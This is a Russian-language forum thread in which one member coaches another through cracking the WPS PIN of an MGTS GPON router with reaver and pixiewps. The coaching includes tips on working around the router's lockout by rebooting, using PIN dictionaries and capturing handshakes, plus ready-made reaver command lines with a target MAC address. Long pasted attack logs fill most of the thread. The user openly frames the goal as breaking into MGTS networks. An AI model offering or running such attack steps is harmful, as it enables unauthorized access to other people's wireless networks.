После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! помогите) я так близко)
binarymaster
24.12.2016, 14:19
подрузамеваю что роутер залочен
Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные.
как разлочить неужели рубильник ) ?
Именно.
Еще вопрос можно ли хеншейк прогнать по словарю на пин
Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять.
а пин прогнать через ривер) ?
Если пароль будет найден, уже нет смысла прогонять пин.
з за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя(
Внешние адаптеры с антеннами наше всё.
Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные.
Именно.
Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять.
Если пароль будет найден, уже нет смысла прогонять пин.
Внешние адаптеры с антеннами наше всё.
СПУСТИл НА ЗЕМЛЮ(
А с этим то как быть, После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! неужели постоянно ребут,получается взлом гадского мгтс становится невыпонимым!?
binarymaster
24.12.2016, 18:20
неужели постоянно ребут
Если pixiewps не находит пин код сразу, то:
1. Попробовать ещё пару раз
2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой)
3. Словить хендшейк, скинуть в тему подбора
а можно ли прогнать пароль wps по типу хендшейка что бы ноутбук постоянно не долбился к роутеру?Тогда взлом был бы намного быстрее
Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.
Если pixiewps не находит пин код сразу, то:
1. Попробовать ещё пару раз
2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой)
3. Словить хендшейк, скинуть в тему подбора
Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.
Pixiewps не пробывал. надо на своем роутере по эксперементировать токо разобратся с прогой надо....
binarymaster
24.12.2016, 20:02
Pixiewps не пробывал
reaver -i wlan0mon -b 94:4A:0C:40:40:9D -a -vv -L -K 1
Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило.
И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?
Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило.
И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?
как я понял это команда отвечает за автоопределение лучшего перебора вот и поставил)
binarymaster
24.12.2016, 22:30
как я понял это команда отвечает за автоопределение лучшего перебора вот и поставил)
Так я и думал.
В общем, пробуйте вот так (когда точка разлочится):
reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1
И номер канала точки укажите вместо решётки.
Так я и думал.
В общем, пробуйте вот так (когда точка разлочится):
reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1<br/>
И номер канала точки укажите вместо решётки.
jr
ок сейчас попробую отпишу. пока эксперементию на своей точке с ребутом проблем нет все упирается в количество попыток , а их всего 10(
root@kali:~# reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv --lock-delay=60 -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y]
[+] p1_index set to 30
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from D4:21:22:FF:27:76
[+] Switching wlan0mon to channel 1
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)
[+] Starting Cracking Session. Pin count: 30, Max pin attempts: 11000
[+] Trying pin 00195676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 41:5a:94:dc:43:2e:de:0d:31:fb:c1:53:59:47:2a:ac
[P] PKE: c6:dd:34:30:b5:83:e8:59:9b:a8:aa:45:f0:42:8a:6d:21 :e7:d1:e9:65:33:4b:b0:9e:98:7c:ff:67:36:d6:4b:09:0 6:b7:48:8f:80:48:01:b7:7c:a1:57:89:21:d4:a9:58:af: ce:34:4c:38:4c:4f:78:9e:6a:f4:17:1e:c1:b0:0a:3d:44 :e5:a7:54:f0:e6:b4:42:58:eb:a0:cb:9d:64:53:01:fd:2 0:70:1a:ff:2f:58:8e:62:79:f6:95:e5:3c:28:19:e6:15: 86:50:4e:91:15:2b:47:83:f9:b4:48:4c:67:d7:b2:90:df :20:e3:07:fc:83:53:29:4d:f4:36:6b:4d:68:a5:3a:ae:d 5:f9:a5:57:18:a5:7b:e6:23:8d:f3:af:f7:c2:ff:15:ed: 9d:76:aa:e7:76:cc:3c:85:dc:47:b6:09:7b:e3:7d:8f:d9 :b0:dd:f1:36:df:dd:b4:ce:d4:c0:bc:39:b7:22:9b:cb:d 2:79:40:66:98:72:95:32:b6
[P] WPS Manufacturer: SERCOMM
[P] WPS Model Name: RV6688BCM
[P] WPS Model Number: RV6688BCM
[P] Access Point Serial Number: 53434F4D14150793
[+] Received M1 message
[P] R-Nonce: a0:96:b9:d2:5e:98:20:82:75:4c:44:96:64:0d:0b:23
[P] PKR: c5:14:14:4f:e1:df:0b:1c:e1:49:a3:22:ad:8f:88:64:7a :73:0b:05:59:c0:a7:ee:10:9c:d3:9c:93:6b:73:42:e1:5 0:93:4e:1f:f3:15:8c:13:58:02:72:9d:c1:3b:45:82:44: 7b:0e:59:28:50:34:bd:12:e3:5f:ba:a5:34:57:b5:49:9b :c4:08:09:ab:29:11:81:0e:cb:55:8e:82:ab:fe:26:4b:8 8:aa:4e:67:24:fc:4b:ae:f0:87:4a:87:b8:db:1c:a4:d4: a3:c6:91:d2:0c:c6:22:9e:d2:7b:1b:97:1f:dc:88:0b:71 :3c:d9:c5:67:fd:59:b6:cd:fc:4a:a9:80:8d:56:d6:1e:c 0:d4:36:dd:c1:a7:52:60:17:f4:8d:49:cb:28:5d:4b:b8: 46:59:4e:af:3d:09:c3:ae:c4:bb:69:70:f3:7f:5b:cc:f5 :2b:8b:09:dd:30:7c:5a:21:f7:54:72:63:40:f4:57:98:d 1:a6:f1:4f:01:cd:4b:75:d8
[P] AuthKey: 79:d6:07:86:98:84:51:82:2a:db:3f:5f:3b:e5:39:1a:32 :65:c0:28:a2:e5:90:31:fc:43:65:5d:c4:ce:20:ca
[+] Sending M2 message
[P] E-Hash1: 9e:c6:5c:68:11:24:dc:f0:79:12:ca:10:17:5d:93:f8:12 :41:74:ba:23:e8:49:95:67:26:1b:16:aa:69:51:92
[P] E-Hash2: 9c:d6:82:f1:3a:32:e8:1b:e3:9d:28:bb:08:db:85:ee:83 :a0:bf:b7:ed:10:98:69:6b:6e:b4:64:02:78:19:68
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] [-] WPS pin not found!<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Time taken: 0 s 137 ms
Я ПРАВИЛЬНО ПОНИМАЮ PIXIEWPS -K 1 не поможет уязвимости нет!?
Попробывал еще так :
[<br/>
reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv -t=30 -d=40 -l=61
<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] y<br/>
[+] p1_index set to 40<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Switching wlan0mon to channel 11<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 40, Max pin attempts: 11000<br/>
[+] Trying pin 00295673.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 05:b7:97:14:7e:4a:65:6c:4c:53:be:0c:5c:cf:d3:f4<br/>
[P] PKE: cc:80:33:29:99:86:18:56:e6:6f:0f:1a:f1:80:08:89:57 :5a:de:0b:59:d2:ba:5c:e5:a7:93:aa:d5:b8:c6:34:fb:d c:95:91:f7:94:31:54:c0:2a:d9:90:f7:6a:19:57:ed:dc: 38:67:c8:57:80:3c:07:55:ce:26:9c:33:a9:78:bd:18:4f :3a:e0:47:1a:ce:c0:41:c1:45:01:38:5b:a6:07:65:5a:e 5:76:81:72:f2:fe:34:33:05:e7:61:d4:ec:f9:b7:ec:4a: f8:77:a4:a3:36:cd:84:1f:80:28:8c:33:7c:04:50:64:3e :8f:01:12:47:4b:4f:e5:85:d2:0f:e1:bc:e3:d9:d0:99:e e:5f:f2:b0:4d:1f:fb:08:98:30:8c:52:b3:dd:49:8e:6d: 1f:e2:7c:b2:be:6b:9d:6d:4d:da:dc:e5:e1:54:7c:50:72 :fe:40:3a:fe:b4:9a:6a:82:53:bb:3c:2e:e9:99:dd:72:d 2:e1:5e:a8:4c:d0:fb:42:9d<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 56:d6:4b:99:ab:94:5e:90:70:d3:f5:3c:3b:8c:f8:7b<br/>
[P] PKR: ca:2b:75:e0:46:ba:57:5c:15:2f:97:76:56:f5:cb:55:7b :3e:20:a5:0c:2f:af:82:61:f3:b0:96:fb:7b:06:05:f4:b 9:77:50:e8:55:e6:e7:b8:67:40:2a:21:74:6d:fc:89:cd: 66:9d:26:45:1e:3d:68:ca:15:15:71:6b:d3:7e:00:de:1a :4f:3f:c5:9c:1c:f6:68:49:9c:55:9d:ef:7f:9b:15:dc:c 2:3b:b8:56:ba:09:a6:8e:dc:e7:90:63:a7:3d:c3:9e:7d: 86:e5:34:37:8c:53:76:6f:76:66:c4:28:9a:e7:d5:c8:8c :31:da:1f:1a:ad:b8:3b:7c:5e:a7:a4:ca:2f:e4:15:04:c 5:38:3b:74:ba:b3:b5:a7:4a:f5:d2:7b:9e:0e:fb:f4:a3: 52:70:72:a3:ca:97:4c:8b:aa:1d:b4:8e:79:b9:08:59:7d :b3:fe:35:78:a7:f7:fd:22:73:4b:df:04:90:88:99:e5:5 4:4b:3a:48:8f:cb:a5:41:02<br/>
[P] AuthKey: a3:73:10:7f:f5:70:25:df:41:f0:f5:fb:e1:eb:bb:8d:1a :a5:df:e5:f5:11:be:dc:55:1b:c0:17:d3:46:11:d3<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 4c:cb:07:c4:1b:ab:e2:9f:cc:09:5b:27:92:8f:6a:fb:f9 :5b:cd:e6:60:4c:cf:14:19:34:d5:73:e3:d8:a4:11<br/>
[P] E-Hash2: 13:8b:ac:eb:e6:26:0b:cc:40:ba:a6:0a:13:a2:3e:c5:f0 :f2:53:48:68:93:d0:ae:7a:0b:4c:50:ee:25:de:ee<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 41<br/>
[+] Pin count advanced: 41. Max pin attempts: 11000<br/>
[+] Trying pin 00305679.<br/>
[+] Sending EAPOL START request<br/>
[!] WARNING: Receive timeout occurred<br/>
[+] Sending EAPOL START request<br/>
/QUOTE]<br/>
<br/>
ПОСЛЕ 10 ПОПЫТОК<br/>
[!] WARNING: Detected AP rate limiting, waiting 0 seconds before re-checking<br/>
[!] WARNING: Detected AP rate limiting, waiting 0 seconds before re-checking<br/>
<br/>
ТВОЙ ВАРИАНТ<br/>
<br/>
root@kali:~# reaver -i wlan0mon -c 11 -b D4:21:22:FF:27:76 -vv -K 1
<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[+] Switching wlan0mon to channel 11<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] Y<br/>
[+] p1_index set to 50<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 50, Max pin attempts: 11000<br/>
[+] Trying pin 00395670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 5c:fb:71:a7:30:7f:ab:0e:00:c7:83:d2:5b:5e:98:dc<br/>
[P] PKE: 67:11:71:72:85:10:7d:8e:4b:69:47:b4:c6:60:05:a2:3d :5a:75:ca:5e:5f:e7:e0:16:bd:3c:87:fc:8e:40:62:62:3 9:5b:50:1e:fa:fb:23:5f:7f:1c:7d:27:4f:93:dc:ab:9f: 35:f0:1e:5c:d9:79:a5:6a:2d:d4:bc:80:2e:61:a2:bc:2b :1b:10:e4:44:0d:78:51:8c:bd:a2:c8:24:87:9b:f3:76:c 6:b3:d2:a0:aa:05:ed:35:2c:11:34:f8:69:32:75:58:4b: 2b:37:0a:25:a9:70:33:42:21:15:8f:a8:5c:ff:33:4c:96 :d7:12:64:cb:fa:33:6a:bf:46:36:27:80:42:86:0f:4b:8 a:16:39:83:5b:b2:37:ae:34:11:c2:fd:72:12:a3:67:95: 82:a4:b6:3a:85:95:34:64:e1:bd:3d:5d:ff:e0:91:41:91 :ad:a2:ce:b5:e1:f2:a0:ea:b6:9f:37:31:66:28:4c:0e:d 2:be:ea:4c:6c:13:86:85:d6<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 99:2c:e0:0e:6a:1c:68:25:d1:b4:c6:99:85:4f:c8:da<br/>
[P] PKR: c3:25:e1:f2:3b:e4:80:52:d2:81:d5:81:ff:dc:a8:17:58 :a7:91:65:5f:b5:22:ee:2b:4b:a4:e7:c0:ef:69:d9:67:f 8:4a:06:10:99:5c:0c:c9:d4:a9:99:f4:ee:b0:47:d8:02: 40:05:9d:9e:9f:94:79:b2:fd:96:3d:d3:a0:f5:a8:dc:4a :54:8e:f2:3f:8a:00:25:9e:b8:09:6b:1c:4c:32:f7:ee:4 0:92:54:54:b1:4d:ff:fd:4e:57:a9:4f:3c:9c:30:54:1f: 65:bf:63:74:65:57:43:84:2a:0c:17:64:bc:2e:93:8a:7f :6d:ca:5e:ab:63:3e:82:2b:8d:8f:97:05:f8:6c:9a:b4:a 4:8e:b5:b9:8f:6c:c8:dd:42:97:d7:89:59:db:9e:79:12: 0c:a2:58:89:80:c2:10:f3:37:d5:56:ec:87:fc:87:85:f5 :67:f3:74:95:81:49:f7:83:d5:60:b7:9d:f8:05:e1:9a:a f:ac:f7:5e:c8:58:9a:7b:a2<br/>
[P] AuthKey: f7:9f:68:d4:1b:83:8a:62:05:18:78:c8:7b:76:46:e9:1a :82:2c:8d:e8:84:aa:56:f6:02:75:d0:42:f2:c4:78<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 3f:ef:f5:5d:a7:6e:f1:14:5d:b8:38:ce:88:9d:e5:10:4c :96:c9:ad:f3:49:21:d5:99:06:0c:77:d1:cd:c6:18<br/>
[P] E-Hash2: f0:6d:2e:a6:3a:46:74:b1:e6:c9:9f:fa:f6:4e:a3:24:ee :92:43:87:cd:f9:ec:ee:06:19:c1:ef:3f:60:62:2b<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Pixiewps 1.2<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] [-] WPS pin not found!<br/>
[Pixie-Dust]<br/>
[Pixie-Dust] Time taken: 0 s 320 ms<br/>
[Pixie-Dust]<br/>
root@kali:~# reaver -i wlan0mon -c 11 -b D4:21:22:FF:27:76 -vv
<br/>
Reaver v1.5.2 WiFi Protected Setup Attack Tool<br/>
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]><br/>
mod by t6_x <[email protected]> & DataHead & Soxrok2212<br/>
<br/>
[+] Switching wlan0mon to channel 11<br/>
[?] Restore previous session for D4:21:22:FF:27:76? [n/Y] Y<br/>
[+] p1_index set to 50<br/>
[+] p2_index set to 0<br/>
[+] Restored previous session<br/>
[+] Waiting for beacon from D4:21:22:FF:27:76<br/>
[+] Associated with D4:21:22:FF:27:76 (ESSID: MGTS_GPON_0793)<br/>
[+] Starting Cracking Session. Pin count: 50, Max pin attempts: 11000<br/>
[+] Trying pin 00395670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 6a:0a:cb:52:25:63:c8:3d:22:8f:a8:82:72:e4:13:38<br/>
[P] PKE: 96:3b:91:fd:bb:d0:7b:69:9f:10:81:54:c3:29:d1:fe:b8 :7a:36:95:4c:5d:90:c7:a2:2b:af:cb:d9:ae:37:0f:7e:4 8:b2:c4:a9:fc:03:cd:1c:5f:37:63:e9:30:bf:91:95:86: a6:0a:a6:57:66:b8:8b:0c:19:34:6a:49:e6:a3:3e:a7:a5 :e4:1d:fe:6f:0a:77:d2:ef:96:51:fa:83:77:4d:d7:e5:6 1:a4:6f:4c:15:ba:19:6d:4a:64:9e:cc:eb:b5:cc:4e:25: f4:13:47:c0:55:e0:45:e6:e3:e2:4f:e7:74:0b:18:af:49 :f2:9a:78:f2:b9:03:a2:2d:9f:35:6b:11:86:a2:b3:e5:c 0:bd:9d:85:d1:fc:e5:59:f5:10:10:94:23:f9:6a:7f:ba: e2:51:6c:29:79:d4:57:b4:32:3c:ef:22:79:d7:3f:49:29 :68:df:b3:f3:de:29:af:f5:6c:fe:e6:67:07:fb:3d:94:b d:1e:40:fc:8c:d5:e2:35:10<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 83:6c:b9:1a:c8:55:ec:7e:d9:47:06:6e:68:cb:32:09<br/>
[P] PKR: fd:7d:0d:ab:2c:79:4e:96:6e:08:65:b4:3e:7e:37:19:48 :aa:ae:84:29:e3:f6:51:28:78:1d:bc:38:e5:d6:e5:74:6 3:54:7a:7c:1f:aa:3c:8f:19:28:a2:04:6c:32:9b:6d:88: 92:58:07:be:a8:ee:78:95:42:a3:3d:5f:f6:3b:3e:da:50 :27:80:84:59:cc:7f:c3:f0:ec:fe:4e:51:8a:85:38:60:8 7:2d:5d:0a:cb:75:a5:de:82:ad:74:a5:d0:26:02:12:b5: 4e:12:68:96:5d:3d:26:f2:c5:b0:f4:b2:fc:41:1f:d9:26 :80:c5:88:9d:77:52:12:bc:9c:38:42:47:ad:e6:ac:ca:1 6:54:da:06:9b:96:64:57:ba:b3:ff:48:e7:6f:fc:f1:34: c2:92:57:17:04:5a:72:a7:35:02:e3:4e:d2:f4:89:f4:74 :fb:8d:78:8b:87:04:91:94:eb:9c:36:b2:4d:49:15:8c:2 f:5e:89:1e:b6:c9:a1:01:88<br/>
[P] AuthKey: 62:38:32:de:1a:6a:e2:90:1a:0e:04:dd:de:f2:d0:b1:dd :0f:c9:37:b7:49:b5:a6:bc:db:f0:fc:04:c6:45:fc<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 9f:80:e8:0a:24:03:20:e9:27:14:61:ea:e9:c1:e9:51:5c :52:47:8f:1c:6c:68:c4:ae:f1:c4:97:ec:c8:6a:ff<br/>
[P] E-Hash2: 1c:67:9a:8f:b9:b5:54:f6:c8:d5:5b:98:f1:18:e4:a1:33 :25:53:c1:82:ff:21:2e:3e:dc:66:be:54:81:a7:bd<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 51<br/>
[+] Pin count advanced: 51. Max pin attempts: 11000<br/>
[+] Trying pin 00405676.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 45:ec:bf:15:4f:5f:b6:c4:30:35:fa:e0:04:ff:1c:97<br/>
[P] PKE: 52:77:c7:25:88:d5:c2:74:2f:c8:ba:ed:29:3a:36:35:55 :68:b3:00:1a:21:15:d2:88:8b:7e:e9:2e:5e:f5:0e:69:5 7:12:9d:20:b2:78:e5:fa:33:42:3f:1e:18:9d:d9:b9:d9: dd:f1:0b:00:26:30:c6:85:c3:b7:14:64:b3:7d:7f:07:73 :a1:e1:af:36:40:af:5e:7e:d8:98:94:6a:37:74:c0:d3:6 3:ec:f5:42:17:db:6c:a3:ff:6c:45:98:1e:d6:53:c0:2f: e0:06:0d:9f:18:6b:05:72:d9:92:3b:63:a7:92:4c:6e:f4 :ea:42:f5:49:d0:0b:97:9f:24:88:e9:90:58:1c:69:45:5 9:4b:84:d4:b6:4a:8d:7e:a6:b4:80:fe:b7:30:a1:dd:5d: a4:a0:91:69:2c:21:32:73:67:f7:24:3b:3d:15:0d:86:6b :53:0c:f8:25:d7:cd:cf:96:54:54:fa:59:93:e6:15:37:9 9:53:40:45:a7:47:6f:82:b7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 88:b9:0a:b6:ac:16:51:8b:03:83:7b:5b:93:4f:ca:9a<br/>
[P] PKR: 91:20:69:00:0b:33:da:e1:3d:a0:cd:af:fb:4d:91:f1:51 :e0:58:09:a0:43:d0:1b:58:ce:d7:32:77:e7:6c:47:e4:e 3:05:b5:ca:a3:5a:27:c1:07:29:1e:e9:84:93:0e:dd:cc: 94:87:72:08:c1:7c:a5:41:a3:ea:2d:3b:22:55:be:60:73 :f7:6f:92:f2:ec:18:d5:d7:5d:7a:12:a8:f5:d3:92:70:8 4:c6:f6:ad:40:d9:43:5c:6c:94:d3:b1:1d:45:ad:78:0b: d2:e8:9f:9f:41:89:17:fb:28:7d:3c:5b:fe:d8:0e:f3:d3 :6b:62:67:b0:f8:7f:d4:ef:1b:e8:32:5e:bf:0c:5c:d1:f 2:7a:a9:72:b9:78:45:17:12:6d:bd:b3:8e:b9:7d:e8:b6: bf:27:ff:65:a4:56:ef:e9:a0:b7:ba:a3:8d:b6:0b:97:b6 :f7:cf:98:6c:45:9a:a9:fe:ec:ca:b8:1f:1b:83:91:0e:3 9:47:60:9e:63:ea:d8:85:93<br/>
[P] AuthKey: d6:a6:35:8d:c7:bd:75:21:55:67:62:4b:a5:6e:ca:a4:16 :cc:ee:87:98:39:2d:d4:e4:6b:91:74:fd:c1:62:0b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 80:4d:4b:8c:9a:e9:12:d9:e6:4d:6f:bf:7a:15:21:7b:f2 :32:ca:8c:23:90:c1:6e:ad:7f:f0:67:b1:ca:62:a7<br/>
[P] E-Hash2: ec:57:e6:89:59:c8:8d:ba:39:0a:fc:94:1b:b7:55:c6:d0 :31:26:af:45:95:2d:bd:bb:05:4d:56:8a:24:bf:16<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 52<br/>
[+] Pin count advanced: 52. Max pin attempts: 11000<br/>
[+] Trying pin 00415675.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 0f:0e:59:73:2d:64:92:89:23:e4:54:3b:3f:58:75:65<br/>
[P] PKE: da:d8:8e:d2:54:80:ee:07:5c:ba:68:d0:ee:a7:89:59:6b :af:79:bb:2a:f4:92:23:be:43:97:e3:69:c3:a6:d4:2e:b a:70:87:17:1e:9b:d8:16:f0:71:ce:2f:57:dd:83:dd:95: 36:78:a1:a3:7e:7c:17:8a:0a:ba:d6:ce:69:83:4c:dc:aa :18:9c:76:66:b6:2a:20:78:3a:cd:2d:02:87:b7:6a:1d:e 1:e9:c1:bd:d4:b1:87:ec:cc:21:63:99:48:6c:cc:74:73: 38:0d:c5:7c:9b:39:83:bf:f6:6b:4d:91:e4:26:ce:45:52 :12:c9:29:ff:45:13:7d:07:13:53:7a:eb:fe:f6:98:9b:b 5:e7:5f:fb:d6:1c:d1:cc:ee:73:0a:2b:6d:ca:ca:e4:54: d4:37:ee:9d:79:0a:54:50:a8:9b:d0:5a:9c:25:b9:7c:17 :6a:5a:31:92:f1:3d:ed:ad:48:df:28:f4:6f:70:01:de:8 d:5d:40:01:41:03:8b:6d:a2<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 5f:c8:f6:c4:d4:4d:01:d5:f7:6b:c9:44:ff:69:5b:00<br/>
[P] PKR: 1a:e8:63:63:1f:41:a8:9f:25:e7:22:44:b6:f0:d3:67:7b :d8:5e:a5:c6:88:d2:61:ac:74:6e:0f:0f:8c:f0:6b:71:0 3:5b:8c:1f:2c:2a:63:3f:f7:6a:51:3f:79:35:8f:9d:b9: 41:53:ab:46:5b:2d:fb:6c:10:89:f5:cf:8c:a1:3f:55:5c :e5:07:0e:91:60:01:95:43:33:b4:5b:f1:75:5b:9c:43:3 7:67:2e:fb:7a:68:9d:bd:ea:de:a6:e5:d4:90:f6:0d:14: 3f:65:41:99:8b:41:fd:41:3a:d7:d8:51:04:45:ce:9d:4e :f2:f4:2f:8a:be:89:a6:5f:69:ee:81:a5:f4:b3:72:f2:4 2:7f:c2:e4:12:a2:12:5c:4d:24:5c:5e:21:3c:7a:1f:c5: 72:41:15:4a:5a:68:c3:16:62:1e:49:55:4f:d4:40:0b:b5 :f2:85:45:08:0d:a8:01:06:60:af:ba:1a:dc:0e:bd:e1:1 3:5e:74:7a:8a:f4:42:e5:9e<br/>
[P] AuthKey: ff:72:b7:70:41:e8:3b:2a:5b:9d:04:43:8a:04:6d:a0:e7 :44:69:e9:e3:d4:64:a6:ff:65:e1:5f:00:e7:16:88<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 50:a5:5e:9f:b4:24:0a:68:46:00:2f:de:ff:cc:6d:48:d9 :b0:a3:89:b5:37:e9:cc:64:86:02:37:65:af:27:3a<br/>
[P] E-Hash2: 34:cf:bd:c7:b7:38:ae:57:26:75:ed:ad:04:32:4f:86:d1 :76:e0:0c:02:30:2a:21:4c:ed:38:bc:3c:23:c9:42<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 53<br/>
[+] Pin count advanced: 53. Max pin attempts: 11000<br/>
[+] Trying pin 00425674.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 6a:e1:55:1e:57:61:77:44:71:a3:7c:f9:51:64:2c:7d<br/>
[P] PKE: 71:e1:20:5c:56:62:fc:8c:81:80:8d:e3:6a:fe:05:1e:b7 :c6:da:20:18:63:60:02:66:07:b2:65:99:0c:d0:5d:f8:1 a:65:19:f2:44:7e:50:10:de:ef:4d:c4:a0:ae:3f:25:f0: 17:e1:db:f7:24:ed:a9:87:89:d8:e9:2f:dd:61:16:59:d5 :aa:09:0e:99:1b:48:c0:22:ac:c7:7f:18:5b:31:f3:00:4 7:62:ad:a8:52:e9:d0:b2:70:82:35:7e:e5:11:60:03:ba: 32:83:4f:ca:a6:07:a8:b4:40:fd:1a:cf:bd:b5:63:96:46 :84:22:e4:c1:5b:f3:16:bf:b0:01:33:92:75:0e:2f:c3:0 6:50:71:79:2d:5b:06:89:9b:d4:59:19:82:38:3d:01:d2: 0d:4c:65:b9:6d:38:01:77:eb:5a:4b:4a:0f:6a:5f:6a:96 :73:e5:9a:ea:d3:ec:cb:d6:f0:39:f5:ce:44:86:68:d4:c 0:67:4d:52:f0:41:62:d7:d7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 6c:db:cc:9a:86:03:b5:9d:3b:cb:1b:08:11:b9:0e:aa<br/>
